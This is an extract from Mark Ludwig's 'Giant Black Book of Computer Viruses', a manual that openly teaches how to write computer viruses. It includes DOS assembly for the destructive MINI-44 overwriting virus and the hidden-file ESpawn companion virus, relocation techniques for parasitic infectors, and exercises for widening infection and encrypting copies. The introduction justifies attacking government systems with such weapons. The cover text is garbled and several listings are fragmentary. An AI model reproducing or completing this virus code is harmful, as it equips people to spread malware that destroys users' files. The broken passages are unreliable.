Professional Documents
Culture Documents
The Giant Black Book of Computer Viruses
The Giant Black Book of Computer Viruses
THE THE
GIANT
GIANT
puter viruses
incompetent
use of these
in this book
for personal
ontrolled and
Computer Viruses
Black Book of
uses on any
ook on
price!
BLACK BOOK
-- of --
ed to know
simplest 44-
ndows, Unix
s programs
hese digital
and poly-
trip to the
viruses. Will
become the
COMPUTER
LUDWIG
of the 21st
for viruses,
e a virus to
r, and the
39.95
VIRUSES
5 3 9 9 5
Second Edition
231
MARK LUDWIG
The
GIANT
BLACK BOOK
of
COMPUTER
VIRUSES
Mark Ludwig
ISBN 0-929408-23-3
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
And God saw that it was
good. And God blessed
them, saying
“Be fruitful and multiply,
fill the earth
and subdue it."
Genesis 1:21,22
Table of Contents
Preface to the Second Edition 1
1. Introduction 3
2. Computer Virus Basics 15
Part I: Self-Reproduction
3. The Simplest COM Infector 21
4. Companion Viruses 39
5. A Parasitic COM Infector 47
6. A Memory Resident Virus 63
7. Infecting EXE Files 71
8. An Advanced Resident Virus 81
9. An Introduction to Boot Sector Viruses 91
10. The Most Successful Virus 109
11. Advanced Boot Sector Techniques 123
12. Infecting Device Drivers 133
13. Source Code Viruses 143
14. Macro Viruses 159
15. A Windows Companion Virus 167
16. A Simple 32-Bit Windows Virus 179
17. A Multi-Section Windows Virus 207
18. A Section Expanding Virus 215
19. A Sophisticated Windows File Infector 237
20. A Unix Virus 253
21. Viruses and the Internet 261
22. Many New Techniques 269
Resources 455
Index 459
Preface to the
Second Edition
Welcome to the second edition of The Giant Black Book of
Computer Viruses. I’ve made some important changes to this
edition, in order to reflect new developments in computer viruses,
as well as to provide a better value for your dollar.
In the past three years, the most important new developments
in computing have unquestionably been the introduction of Win-
dows 95 and the growing popularity of the internet. While we have
not seen a profusion of network-savvy viruses travelling over the
internet, the potential threat is obvious to most people. This poten-
tial has led to a growing phenomenon of internet-related virus
hoaxes, the first of which was the phenomenally popular “ Good
Times Virus” hoax. We’re getting close to the point that hoaxes
will be replaced by the real thing, though, and we’ll explore some
of the possibilities here.
In contrast to the potential of the internet, the introduction of
Windows 95 has already profoundly influenced the direction of
computer virus development. Firstly, Windows 95 has virtually
stopped the development of DOS-based software, and is slowly but
surely pushing DOS programs into oblivion. As a result, many
viruses which assume a DOS environment are no longer threats in
the real world. On the other hand, the ever-growing complexity of
the operating environment and of applications programs has opened
up all kinds of new possibilities for viruses. The most important
category of viruses which have emerged in this new environment
are the so-called macro viruses, which have been both popular
among virus writers and successful at establishing populations in
2 The Giant Black Book of Computer Viruses
Mark Ludwig
May 15, 1998
Chapter 1
Introduction
This book will simply and plainly teach you how to write
computer viruses. It is not one of those all too common books that
decry viruses and call for secrecy about the technology they em-
ploy, while curiously giving you just enough technical details about
viruses so you don’t feel like you’ve been cheated. Rather, this book
is technical and to the point. Here you will find complete sources
for viruses, as well as enough technical knowledge to become a
proficient cutting-edge virus programmer or anti-virus program-
mer.
Now I am certain this book will be offensive to some people.
Publication of so-called “ inside information” always provokes the
ire of those who try to control that information. Though it is not my
intention to offend, I know that in the course of informing many I
will offend some.
In another age, this elitist mentality would be derided as a relic
of monarchism. Today, though, many people seem all too ready to
give up their God-given rights with respect to what they can own,
to what they can know, and to what they can do for the sake of their
personal and financial security. This is plainly the mentality of a
slave, and it is rampant everywhere I look. I suspect that only the
sting of a whip will bring this perverse love affair with slavery to
an end.
I, for one, will defend freedom, and specifically the freedom to
learn technical information about computer viruses. As I see it,
there are three reasons for making this kind of information public:
faced with a lot of virus attacks. For example, one attack a week
means that you have a probability
P = (0.99)52 = 0.59
that your anti-virus will catch everything. One attack a day means
that the chances your scanner will catch everything falls to
P = (0.99)365 = 0.026
or a 97.4% chance that something will slip by. And this analysis
assumes you have a good anti-virus and that you are not subject to
malicious activity where someone intentionally introduces viruses
which your anti-virus software won’t detect.
Next, just because an anti-virus program is going to help you
identify a virus doesn’t mean it will give you a lot of help getting
rid of it. Especially with the less common varieties, you might find
that the cure is worse than the virus itself. For example, your “ cure”
might simply delete all the EXE files on your disk, or rename them
to VXE, etc.
In the end, any competent professional must realize that solid
technical knowledge is the foundation for all viral defense. In some
situations it is advisable to rely on another party for that technical
knowledge, but not always. There are many instances in which a
failure of data integrity could cost people their lives, or could cost
large sums of money, or could cause pandemonium. In these
situations, waiting for a third party to analyze some new virus and
send someone to your site to help you is out of the question. You
have to be able to handle a threat when it comes—and this requires
detailed technical knowledge.
Finally, even if you intend to rely heavily on a commercial
anti-virus program for protection, solid technical knowledge will
make it possible to conduct an informal evaluation of that product.
I have been appalled at how poor some published anti-virus product
reviews have been. For example, PC Magazine’s reviews in the
March 16, 1993 issue1 put Central Point Anti-Virus in the Number
1 R. Raskin and M. Kabay, “ Keeping up your guard” , PC Magazine, March 16, 1993,
6 The Giant Black Book of Computer Viruses
One slot despite the fact that this product could not even complete
analysis of a fairly standard test suite of viruses (it hung the
machine)2 and despite the fact that this product has some glaring
security holes which were known both by virus writers and the anti-
viral community at the time,3 and despite the fact that the person in
charge of those reviews was specifically notified of the problem.
With a bit of technical knowledge and the proper tools, you can
conduct your own review to find out just what you can and cannot
expect from an anti-virus program.
Military Applications
High-tech warfare relies increasingly on computers and infor-
mation.4 Whether we’re talking about a hand-held missile, a spy
satellite or a ground station, an early-warning radar station or a
personnel carrier driving cross country, relying on a PC and the
Global Positioning System to navigate, computers are everywhere.
Stopping those computers or convincing them to report misinfor-
mation can thus become an important part of any military strategy
or attack.
In the twentieth century it has become the custom to keep
military technology cloaked in secrecy and deny military power to
the people. As such, very few people know the first thing about it,
and very few people care to know anything about it. However, the
older American tradition was one of openness and individual
responsibility. All the people together were the militia, and standing
armies were the bane of free men.
In suggesting that information about computer viruses be made
public because of its potential for military use, I am harking back
to that older tradition. Standing armies and hordes of bureaucrats
are a bane to free men. (And by armies, I don’t just mean Army,
Navy, Marines, Air Force, etc.)
It would seem that the governments of the world are inexorably
driving towards an ideal: the Orwellian god-state. Right now we
p. 209.
2 Virus Bulletin, January, 1994, p. 14.
3 The Crypt Newsletter, No. 8.
4 Schwartau, Win, Information Warfare, (Thunder’s Mouth, New York:1994).
Introduction 7
have a first lady who has even said the most important book she’s
ever read was Orwell’s 1984. She is working hard to make it a
reality, too. Putting military-grade weapons in the hands of ordinary
citizens is the surest way of keeping tyranny at bay. That is a
time-honored formula. It worked in America in 1776. It worked in
Switzerland during World War II. It worked for Afganistan in the
1980’s, and it has worked countless other times. The Orwellian state
is an information monopoly. Its power is based on knowing every-
thing about everybody. Information weapons could easily make
that an impossibility.
I have heard that the US Postal Service is ready to distribute
100 million smart cards to citizens of the US. Perhaps that is just a
wild rumor. Perhaps by the time you read this, you will have
received yours. Even if you never receive it, though, don’t think the
government will stop collecting information about you, and de-
mand that you—or your bank, phone company, etc.—spend more
and more time sending it information about yourself. In seeking to
become God it must be all-knowing and all-powerful.
Yet information is incredibly fragile. It must be correct to be
useful, but what if it is not correct? Let me illustrate: before long
we may see 90% of all tax returns being filed electronically.
However, if there were reason to suspect that 5% of those returns
had been electronically modified (e.g. by a virus), then none of them
could be trusted.5 Yet to audit every single return to find out which
were wrong would either be impossible or it would catalyze a
revolution—I’m not sure which. What if the audit process released
even more viruses so that none of the returns could be audited unless
everything was shut down, and they were gone through by hand
one by one?
In the end, the Orwellian state is vulnerable to attack—and it
should be attacked. There is a time when laws become immoral,
and to obey them is immoral, and to fight against not only the
individual laws but the whole system that creates them is good and
right. I am not saying we are at that point now, as I write. Certainly
there are many laws on the books which are immoral, and that
number is growing rapidly. One can even argue that there are laws
5 Such a virus, the Tax Break, has actually been proposed, and it may exist.
8 The Giant Black Book of Computer Viruses
Computational Exploration
Put quite simply, computer viruses are fascinating. They do
something that’s just not supposed to happen in a computer. The
idea that a computer could somehow “ come alive” and become
quite autonomous from man was the science fiction of the 1950’s
and 1960’s. However, with computer viruses it has become the
reality of the 1990’s. Just the idea that a program can take off and
go—and gain an existence quite apart from its creator—is fascinat-
ing indeed. I have known many people who have found viruses to
be interesting enough that they’ve actually learned assembly lan-
guage by studying them.
A whole new scientific discipline called Artificial Life has
grown up around this idea that a computer program can reproduce
and pass genetic information on to its offspring. What I find
fascinating about this new field is that it allows one to study the
mechanisms of life on a purely mathematical, informational level.
That has at least two big benefits:6
6 Please refer to my other book, Computer Viruses, Artificial Life and Evolution, for a
detailed discussion of these matters.
Introduction 9
inanimate matter, all life is bad because it just hastens the entropic
death of the universe.
I say all of this not because I have a bone to pick with ecologists.
Rather I want to apply the same reasoning to the world of computer
viruses. As long as one uses only financial criteria to evaluate the
worth of a computer program, viruses can only be seen as a menace.
What do they do besides damage valuable programs and data? They
are ruthless in attempting to gain access to the computer system
resources, and often the more ruthless they are, the more successful.
Yet how does that differ from biological life? If a clump of moss
can attack a rock to get some sunshine and grow, it will do so
ruthlessly. We call that beautiful. So how different is that from a
computer virus attaching itself to a program? If all one is concerned
about is the preservation of the inanimate objects (which are
ordinary programs) in this electronic world, then of course viruses
are a nuisance.
But maybe there is something deeper here. That all depends on
what is most important to you, though. It seems that modern culture
has degenerated to the point where most men have no higher goals
in life than to seek their own personal peace and prosperity. By
personal peace, I do not mean freedom from war, but a freedom to
think and believe whatever you want without ever being challenged
in it. More bluntly, the freedom to live in a fantasy world of your
own making. By prosperity, I mean simply an ever increasing
abundance of material possessions. Karl Marx looked at all of
mankind and said that the motivating force behind every man is his
economic well-being. The result, he said, is that all of history can
be interpreted in terms of class struggles—people fighting for
economic control. Even though many decry Marx as the father of
communism, our nation is trying to squeeze into the straight jacket
he has laid for us. Here in America, people vote their wallets, and
the politicians know it. That’s why 98% of them go back to office
election after election, even though many of them are great philan-
derers.
In a society with such values, the computer becomes merely a
resource which people use to harness an abundance of information
and manipulate it to their advantage. If that is all there is to
computers, then computer viruses are a nuisance, and they should
be eliminated. But surely there must be some nobler purpose for
mankind than to make money, despite its necessity. Marx may not
Introduction 11
think so. The government may not think so. And a lot of loud-
mouthed people may not think so. Yet great men from every age
and every nation testify to the truth that man does have a higher
purpose. Should we not be as Socrates, who considered himself
ignorant, and who sought Truth and Wisdom, and valued them more
highly than silver and gold? And if so, the question that really
matters is not how computers can make us wealthy or give us power
over others, but how they might make us wise. What can we learn
about ourselves? about our world? and, yes, maybe even about
God? Once we focus on that, computer viruses become very
interesting. Might we not understand life a little better if we can
create something similar, and study it, and try to understand it? And
if we understand life better, will we not understand our lives, and
our world better as well?
Several years ago I would have told you that all the information
in this book would probably soon be outlawed. However, I think
The Little Black Book and The Giant Black Book have done some
good work in changing people’s minds about the wisdom of out-
lawing it. There are some countries, like England and Holland
(hold-outs of monarchism) where there are laws against distributing
this information. Then there are others, like France, where impor-
tant precedents have been set to allow the free exchange of such
information.7 What will happen in the US right now is anybody’s
guess. Although the Bill of Rights would seem to protect such
activities, the Constitution has never stopped Congress or the
bureaucrats in the past.
In the end, I think the deciding factor will simply be that the
anti-virus industry is becoming more and more pragmatic and less
and less idealistic. Legislation against virus writers will have little
effect, since it is practically impossible to identify who wrote a virus
if that author does not wish to be found out, and since viruses are
an international phenomenon. So rather than beating their drums
and demanding legislation, anti-virus developers are moving more
and more toward building better products, as well they should. With
the pressure from lobbyists to pass legislation abating, Congress
7 An attempt to ban The Little Black Book in France went all the way to the Supreme
Court there, and was soundly defeated, establishing the right to publish such
information.
12 The Giant Black Book of Computer Viruses
will not pay much attention to the issue because it has more
important problems to deal with.
Yet these political developments do not insure that computer
viruses will survive. It only means they probably won’t be out-
lawed. Much more important to the long term survival of viruses
as a viable form of programming is to find beneficial uses for them.
Most people won’t suffer even a benign virus to remain in their
computer once they know about it, since they have been condi-
tioned to believe that VIRUS = BAD. No matter how sophisticated
the stealth mechanism, it is no match for an intelligent programmer
who is intent on catching the virus. This leaves virus writers with
one option: create viruses which people will want on their comput-
ers.
Some progress has already been made in this area. For example,
the virus called Cruncher compresses executable files and saves
disk space for you. The Potassium Hydroxide virus encrypts your
hard disk and floppies with a very strong algorithm so that no one
can access it without entering the password you selected when you
installed it. Another virus, which will teach a child basic math, is
suggested as an exercise in the last chapter. I expect we will see
more and more beneficial viruses like this as time goes on. As the
general public learns to deal with viruses more rationally, it begins
to make sense to ask whether any particular application might be
better implemented using self-reproduction. We will discuss this
more in later chapters.
For now, I’d like to invite you to take the attitude of an early
scientist. These explorers wanted to understand how the world
worked—and whether it could be turned to a profit mattered little.
They were trying to become wiser in what’s really important by
understanding the world a little better. After all, what value could
there be in building a telescope so you could see the moons around
Jupiter? Galileo must have seen something in it, and it must have
meant enough to him to stand up to the ruling authorities of his day
and do it, and talk about it, and encourage others to do it. And to
land in prison for it. Today some people are glad he did.
So why not take the same attitude when it comes to creating
“ life” on a computer? One has to wonder where it might lead.
Could there be a whole new world of electronic artificial life forms
possible, of which computer viruses are only the most rudimentary
sort? Perhaps they are the electronic analog of the simplest one-
Introduction 13
celled creatures, which were only the tiny beginning of life on earth.
What would be the electronic equivalent of a flower, or a dog?
Where could it lead? The possibilities could be as exciting as the
idea of a man actually standing on the moon would have been to
Galileo. We just have no idea.
Whatever those possibilities are, one thing is certain: the open-
minded individual—the possibility thinker—who seeks out what is
true and right, will rule the future. Those who cower in fear, those
who run for security and vote for personal peace and affluence have
no future. No investor ever got rich by hiding his wealth in safe
investments. No intellectual battle was ever won through retreat.
No nation has ever become great by putting its citizens’ eyes out.
So put such foolishness aside and come explore this fascinating new
world with me.
14 The Giant Black Book of Computer Viruses
Chapter 2
Computer Virus
Basics
What is a computer virus? Simply put, it is a program that
reproduces. When it is executed, it simply makes one or more
copies of itself. Those copies may later be executed to create still
more copies, ad infinitum.
Typically, a computer virus attaches itself to another program,
or rides on the back of another program, in order to facilitate
reproduction. This approach sets computer viruses apart from other
self-reproducing software because it enables the virus to reproduce
without the operator’s consent. Compare this with a simple program
called “ 1.COM” . When run, it might create “ 2.COM” and
“ 3.COM” , etc., which would be exact copies of itself. Now, the
average computer user might run such a program once or twice at
your request, but then he’ll probably delete it and that will be the
end of it. It won’t get very far. Not so, the computer virus, because
it attaches itself to otherwise useful programs. The computer user
will execute these programs in the normal course of using the
computer, and the virus will get executed with them. In this way,
viruses have gained viability on a world-wide scale.
Actually, the term computer virus is a misnomer. It was coined
by Fred Cohen in his 1985 graduate thesis,1 which discussed
self-reproducing software and its ability to compromise so-called
1 Fred Cohen, Computer Viruses, (ASP Press, Pittsburgh:1986). This is Cohen’s 1985
dissertation from the University of Southern California.
16 The Giant Black Book of Computer Viruses
2 Fred Cohen, It’s Alive, The New Breed of Living Computer Programs, (John Wiley,
New York:1994), p. 54.
3 The term “ self-reproducing automaton” was coined by computer pioneer John Von
Neumann. See John Von Neumann and Arthur Burks, Theory of Self-Reproducing
Automata (Univ. of Illinois Press, Urbana: 1966).
4 Note that this aspect of a virus becomes easier and easier to implement the more of a
pig your operating system becomes. For example, DOS would never initiate a few
minutes of disk activity for no apparent reason, but that is a frequent occurrence with
Windows 95. So when your disk starts buzzing for no apparent reason, it is no longer
an immediate clue to viral activity.
Computer Virus Basics 17
date on a file the same when a virus infects it, to complex routines
that camouflage viruses and trick specific anti-virus programs into
believing they’re not there, or routines which turn the anti-virus
they attack into a logic bomb itself.
Both the search and copy mechanisms can be designed with
anti-detection in mind, as well. For example, the search routine may
be severely limited in scope to avoid detection. A routine which
checked every file on every disk drive, without limit, would take a
long time and it would cause enough unusual disk activity that an
alert user would become suspicious.
Finally, a virus may contain routines unrelated to its ability to
reproduce effectively. These may be destructive routines aimed at
wiping out data, or mischievous routines aimed at spreading a
political message or making people angry, or even routines that
perform some useful function.
Virus Classification
Computer viruses are normally classified according to the types
of programs they infect and the method of infection employed. The
broadest distinction is between boot sector infectors, which take
over the boot sector (which executes only when you first turn your
computer on) and file infectors, which infect ordinary program files
on a disk. Some viruses, known as multi-partite viruses, infect both
boot sectors and program files.
Program file infectors may be further classified according to
which types of programs they infect. They may infect COM, EXE
or SYS files, or any combination thereof. Then EXE files come in
a variety of flavors, including plain-vanilla DOS EXE’s, Windows
16- or 32-bit EXE’s, OS/2 EXE’s, etc. These types of programs
have considerable differences, and the viruses that infect them are
very different indeed.
Finally, we must note that a virus can be written to infect any
kind of code, even code that might have to be compiled or inter-
preted before it can be executed. Thus, a virus could infect a C or
Basic program, a batch file, or a Paradox or Dbase program. Or it
can infect a Microsoft Word document as a macro. It needn’t be
limited to infecting machine language programs at all.
Computer Virus Basics 19
1. Overwriting viruses
2. Companion viruses
3. Parasitic viruses
If you can understand these three simple types of viruses, you will
already understand the majority of DOS viruses. Most of them are
one of these three types and nothing more.
Before we dig into how the simplest of these viruses, the
overwriting virus, works, let’s take an in-depth look at how a COM
program works. It is essential to understand what it is you’re
attacking if you’re going to do it properly.
ORG 100H
HOST:
mov ah,9 ;prepare to display a message
mov dx,OFFSET HI ;address of message
int 21H ;display it with DOS
END HOST
the offset register tells how many bytes to add to the start of the 16
byte block to locate the desired byte in memory. For example, if
the ds register is set to 1275 Hex and the bx register is set to 457
Hex, then the physical 20 bit address of the byte ds:[bx] is
1275H x 10H = 12750H
+ 457H
—————
12BA7H
No offset should ever have to be larger than 15, but one normally
uses values up to the full 64 kilobyte range of the offset register.
This leads to the possibility of writing a single physical address in
several different ways. For example, setting ds = 12BA Hex and
bx = 7 would produce the same physical address 12BA7 Hex as in
the example above. The proper choice is simply whatever is con-
venient for the programmer. However, it is standard programming
practice to set the segment registers and leave them alone as much
as possible, using offsets to range through as much data and code
as one can (64 kilobytes if necessary). Typically, in 8088 assembler,
the segment registers are implied quantities. For example, if you
write the assembler instruction
mov ax,[bx]
the int 20H instruction is stored in the PSP. The int 20H returns
control to DOS. DOS then sets the stack pointer sp to FFFE Hex,
and jumps to offset 100H, causing the requested COM program to
execute.
Okay, armed with this basic understanding of how a COM
program works, let’s go on to look at the simplest kind of virus.
Overwriting Viruses
Overwriting viruses are simple but mean viruses which have
little respect for your programs. Once infected by an overwriting
virus, the host program will no longer work properly because at
least a portion of it has been replaced by the virus code—it has been
overwritten—hence the name.
This disrespect for program code makes programming an over-
writing virus an easy task, though. In fact, some of the world’s
smallest viruses are overwriting viruses. Let’s take a look at one,
MINI-44.ASM, listed in Figure 3.3. This virus is a mere 44 bytes
when assembled, but it will infect (and destroy) every COM file in
your current directory if you run it.
This virus operates as follows:
SP— 0FFFFH
Stack Area
Uninitialized
Data
COM File
Image
IP — 100H
PSP
0H
As you can see, the end result is that every COM file in the current
directory becomes infected, and the infected host program which
was loaded executes the virus instead of the host.
The basic functions of searching for files and writing to files
are widely used in many programs and many viruses, so let’s dig
into the MINI-44 a little more deeply to understand its search and
infection mechanisms.
.model small
.code
ORG 100H
START:
mov ah,4EH ;search for *.COM (search first)
mov dx,OFFSET COM_FILE
int 21H
SEARCH_LP:
jc DONE
mov ax,3D01H ;open file we found
mov dx,FNAME
int 21H
mov ah,3EH
int 21H ;close file
mov ah,4FH
int 21H ;search for next file
jmp SEARCH_LP
DONE:
ret ;exit to DOS
END START
10H 1FH
Two Second
Hours (0-23) Minutes (0-59) Increments (0-29)
15 Bit 0
8 Bit 0
ably be enough to get by. However, if you are going to study viruses
on your own, it is definitely worthwhile knowing about all of the
various functions available, as well as the finer details of how they
work and what to watch out for.
To search for other files to infect, the MINI-44 virus uses the
DOS search functions. The people who wrote DOS knew that many
programs (not just viruses) require the ability to look for files and
operate on them if any of the required type are found. Thus, they
incorporated a pair of searching functions into the Interrupt 21H
handler, called Search First and Search Next. These are some of
the more complicated DOS functions, so they require the user to do
a fair amount of preparatory work before he calls them. The first
step is to set up an ASCIIZ1 string in memory to specify the directory
to search, and what files to search for. This is simply an array of
bytes terminated by a null byte (0). DOS can search and report on
either all the files in a directory or a subset of files which the user
can specify by file attribute and by specifying a file name using the
wildcard characters “?” and “*” , which you should be familiar
with from executing commands like copy *.* a: and dir a???_100.*
from the command line in DOS. (If not, a basic book on DOS will
explain this syntax.) For example, the ASCIIZ string
DB ’\system\hyper.*’,0
will set up the search function to search for all files with the name
hyper, and any possible extent, in the subdirectory named system.
DOS might find files like hyper.c, hyper.prn, hyper.exe, etc. If you
don’t specify a path in this string, but just a file name, e.g. “ *.COM”
then DOS will search the current directory.
After setting up this ASCIIZ string, one must set the registers
ds and dx up to point to the segment and offset of this ASCIIZ string
in memory. Register cl must be set to a file attribute mask which
will tell DOS which file attributes to allow in the search, and which
to exclude. The logic behind this attribute mask is somewhat
complex, so you might want to study it in detail in Appendix A.
Finally, to call the Search First function, one must set ah = 4E Hex.
COMFILEDB ’*.COM’,0
If this routine executed successfully, the DTA might look like this:
03 3F 3F 3F 3F 3F 3F 3F-3F 43 4F 4D 06 18 00 00 .????????COM....
00 00 00 00 00 00 16 98-30 13 BC 62 00 00 43 4F ........0..b..CO
4D 4D 41 4E 44 2E 43 4F-4D 00 00 00 00 00 00 00 MMAND.COM.......
when the program reaches the label FOUND. In this case the search
found the file COMMAND.COM.
In comparison with the Search First function, the Search Next
is easy, because all of the data has already been set up by the Search
First. Just set ah = 4F hex and call DOS interrupt 21H:
mov ah,4FH ;search next function
int 21H ;call DOS
jc NOFILE ;no, go handle no file found
FOUND2: ;else process the file
34 The Giant Black Book of Computer Viruses
If another file is found the data in the DTA will be updated with the
new file name, and ah will be set to zero on return. If no more
matches are found, DOS will set ah to something besides zero on
return. One must be careful here so the data in the DTA is not altered
between the call to Search First and later calls to Search Next,
because the Search Next expects the data from the last search call
to be there.
The MINI-44 virus puts the DOS Search First and Search Next
functions together to find every COM program in a directory, using
the simple logic of Figure 3.5.
The obvious result is that MINI-44 will infect every COM file
in the directory you’re in as soon as you execute it. Simple enough.
Search for
First File
File No
Exit
Found? to
DOS
Yes
Infect File
Search for
Next File
Uninfected Infected
Discussion
MINI-44 is an incredibly simple virus as far as viruses go. If
you’re a novice at assembly language, it’s probably just enough to
cut your teeth on without being overwhelmed. If you’re a veteran
assembly language programmer who hasn’t thought too much
about viruses, you’ve just learned how ridiculously easy it is to
write a virus.
Of course, MINI-44 isn’t a very good virus. Since it destroys
everything it touches, all you have to do is run one program to know
you’re infected. And the only thing to do once you’re infected is to
delete all the infected files and replace them from a backup. In short,
this isn’t the kind of virus that stands a chance of escaping into the
wild and showing up on computers where it doesn’t belong without
any help.
In general, overwriting viruses aren’t very good at establishing
a population in the wild because they are so easy to spot, and
The Simplest COM Infector 37
Exercises
1. Overwriting viruses are one of the few types of viruses which can be
written in a high level language, like C, Pascal or Basic. Design an
overwriting virus using one of these languages. Hint: see the book
Computer Viruses and Data Protection, by Ralf Burger.
3. MINI-44 will not infect files with the hidden, system, or read-only file
attributes set. What very simple change can be made to cause it to infect
hidden and system files? What would have to be done to make it infect
read-only files?
38 The Giant Black Book of Computer Viruses
Chapter 4
Companion Viruses
Source Code for this Chapter: \ESPAWN\ESPAWN.ASM
Directory of C:\VIRUTEST
Virus
is safe to move it down to just above the end of the code. This is
accomplished by changing sp,
mov sp,OFFSET FINISH + 100H
Next, ESpawn must tell DOS to release the unneeded memory with
Interrupt 21H, Function 4AH, putting the number of paragraphs (16
byte blocks) of memory to keep in the bx register:
mov ah,4AH
mov bx,(OFFSET FINISH)/16 + 11H
int 21H
Finally, the al register should be set to zero to tell DOS to load and
execute the program. (Other values let DOS just load, but not
execute, etc. See Appendix A.) The code to do all this is pretty
simple:
mov dx,OFFSET REAL_NAME
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H
There! DOS loads and executes the host without any further fuss,
returning control to the virus when it’s done. Of course, in the
process of executing, the host will mash most of the registers,
including the stack and segment registers, so the virus must clean
things up a bit before it does anything else. In particular, it must use
cs to restore ds, es and ss, and it must restore the stack pointer sp:
mov ax,cs
mov ss,ax
mov ds,ax
mov es,ax
mov sp,(FINISH - ESPAWN) + 200H
File Searching
Our companion virus searches for files to infect in the same
way MINI-44 does, using the DOS Search First and Search Next
functions, Interrupt 21H, Functions 4EH and 4FH. ESpawn is
designed to infect every COM program file it can find in the current
directory as soon as it is executed. The search process itself follows
the same logic as MINI-44 in Figure 3.5.
The search routine looks like this now:
mov dx,OFFSET EXE_MASK
mov ah,4EH ;search first
xor cx,cx ;normal files only
SLOOP: int 21H ;do search
jc SDONE ;none found, exit
call INFECT_FILE ;one found, infect it
mov ah,4FH ;search next fctn
jmp SLOOP ;do it again
SDONE:
Companion Viruses 43
Note that if ESpawn had done its searching and infecting before
the host was executed, it would not be a wise idea to leave the DTA
at offset 80H. That’s because the command line parameters are
stored in the same location, and the search would wipe those
parameters out. For example, if you had a disk copying program
called MCOPY, which was invoked with a command like this:
C:\>MCOPY A: B:
to indicate copying from A: to B:, the search would wipe out the
“ A: B:” and leave MCOPY clueless as to where to copy from and
to. In such a situation, another area of memory would have to be
reserved, and the DTA would have to be moved to that location
from the default value. All one would have to do in this situation
would be to define
DTA DB 43 dup (?)
Note that it was perfectly all right for MINI-44 to use the default
DTA because it destroyed the program it infected. As such it
mattered but little that the parameters passed to the program were
also destroyed. Not so for a virus that doesn’t destroy the host.
File Infection
Once ESpawn has found a file to infect, the process of infection
is fairly simple. To infect a program, ESpawn just makes a copy of
itself with the name of the original host, only with the extent COM
instead of EXE. In this way, the next time the name of the host is
typed on the command line, the virus will be executed instead,
because COM files always get precedence.
To rename the host, the virus copies its name from the DTA,
where the search routine put it, to a buffer called REAL_NAME.
Then ESpawn changes the name in the DTA by changing the last
three letters to “ COM” . Next, ESpawn creates a file with the
original name of the host,
mov dx,9EH ;DTA + 1EH, COM file name
mov ah,3CH ;DOS file create function
mov cx,2 ;hidden attribute
int 21H
Notice that when ESpawn creates the file, it sets the hidden
attribute on the file. This makes disinfecting ESpawn harder. You
won’t see the viral files when you do a directory and you can’t just
delete them—you’ll need a special utility like Norton Utilities.
Companion Viruses 45
Variations on a Theme
There are a wide variety of strategies possible in writing
companion viruses, and most of them have been explored by virus
writers in one form or another. We’ve already discussed the use of
COM files to fool DOS into executing them instead of EXE files,
and renaming a file, e.g. from COM to COM or EXE to EXF.
Yet there need not be any relationship between the name of the
virus executable and the host it executes. In fact, DOS Interrupt
21H, Function 5AH will create a file with a completely random
name. The host can be renamed to that, hidden, and the virus can
assume the host’s original name. Since the DOS File Rename
function can actually change the directory of the host while renam-
ing it, the virus could also collect up all the hosts in one directory,
say \WINDOWS\TMP, where a lot of random file names would be
expected. (And pity the poor user who decides to delete all those
“ temporary” files.)
Neither must one use the DOS EXEC function to load a file.
One could, for example, use DOS Function 26H to create a program
segment, and then load the program with a file read. (This works
fine for COM files, it’s a bit tough for EXE files, though.
One should also note that ESpawn will work perfectly well with
Windows EXEs in Windows 95, etc. Although a program launched
through the Windows File Manager won’t execute the virus be-
cause it goes straight for the EXE file, typing the name at the DOS
prompt will both execute the virus and launch the Windows EXE
properly. This is a fine example of a very simple, old virus that is
still able to replicate in an advanced operating system environment.
Exercises
The next five exercises will lead the reader through the neces-
sary steps to create a beneficial companion virus which secures all
the programs in a directory with a password without which they
cannot be executed. While this virus doesn’t provide world-class
security, it will keep the average user from nosing around where he
doesn’t belong on a DOS machine.
example, the directory C:\DOS would do. (Hint: All you need to do is
modify the string EXE_MASK.)
2. Modify ESpawn so it will infect both COM and EXE files. (Hint:
Front-end the FIND_FILES routine with another routine that will set
dx to point to EXE_MASK, call FIND_FILES, then point to another
COM_MASK, and call FIND_FILES again. Make the virus rename the
files it infects, e.g. COM to CON, EXE to EXF.)
5. Add routines to encrypt both the password and the host name in all
copies of the virus which are written to disk, and then decrypt them in
memory as needed.
6. Write a companion virus that infects both COM and EXE files by
putting a file of the exact same name (hidden, of course) in the root
directory. Don’t infect files in the root directory. Why does this usually
work? What might stop it from working?
Chapter 5
A Parasitic COM
Infector
Source Code for this Chapter: \TIMID\TIMID.ASM
BEFORE AFTER
mov dx,257H
TIMID
VIRUS
154AH
Uninfected Infected
Host Host
COM File COM File
mov dx,257H jmp 154AH
100H 100H
cs:327 CALL_ME:. . .
. . .
ret
Because the call only references the distance between the current
ip and the routine to call, this piece of code could be moved to any
offset and it would still work properly. That is called relative
addressing. All near and short jumps work this way.
50 The Giant Black Book of Computer Viruses
COM_FILE db ’*.COM’,0
will load the dx register with the absolute address of the string
COM_FILE. If this type of a construct is used in a virus that changes
offsets, it will quickly crash. As soon as the virus moves to any
offset but where it was originally compiled, the offset put in the dx
register will no longer point to the string “ *.COM” . Instead it may
point to uninitialized data, or to data in the host, etc., as illustrated
in Figure 5.2.
Any virus located at the end of a COM program must deal with
this difficulty by addressing data indirectly. The typical way to do
this is to figure out what offset the code is actually executing at, and
save that value in a register. Then you access data by using that
register in combination with an absolute offset. For example, the
code:
call GET_ADDR ;put OFFSET GET_ADDR on stack
GET_ADDR: pop di ;get that offset into di
sub di,OFFSET GET_ADDR ;subtract compiled value
instead of
mov dx,OFFSET COM_FILE
or
mov ax,[di+OFFSET WORDVAL]
rather than
mov ax,[WORDVAL]
This really isn’t too difficult to do, but it’s essential in any virus
that changes its starting point or it will crash.
Another important method for avoiding absolute data in relo-
cating code is to store temporary data in a stack frame. This
technique is almost universal in ordinary programs which create
temporary data for the use of a single subroutine when it is execut-
ing. Our virus uses this technique too.
To create a stack frame, one simply subtracts a desired number
from the sp register to move the stack down, and then uses the bp
register to access the data. For example, the code
push bp ;save old bp
sub sp,100H ;subtract 256 bytes from sp
mov bp,sp ;set bp = sp
52 The Giant Black Book of Computer Viruses
and the data is gone. To address data on the stack frame, one simply
uses the bp register. For example,
mov [bp+10H],ax
stored ax in bytes 10H and 11H in the data area on the stack. The
stack itself remains functional because anything pushed onto it goes
below this data area.
Timid-II makes use of both of these techniques to overcome
the difficulties of relocating code. The search string “ *.*” is
referenced using an index register, and uninitialized data, like the
DTA, is created in a stack frame. These relocation techniques are
important, and we’ll find them cropping up again when discussing
32-bit Windows.
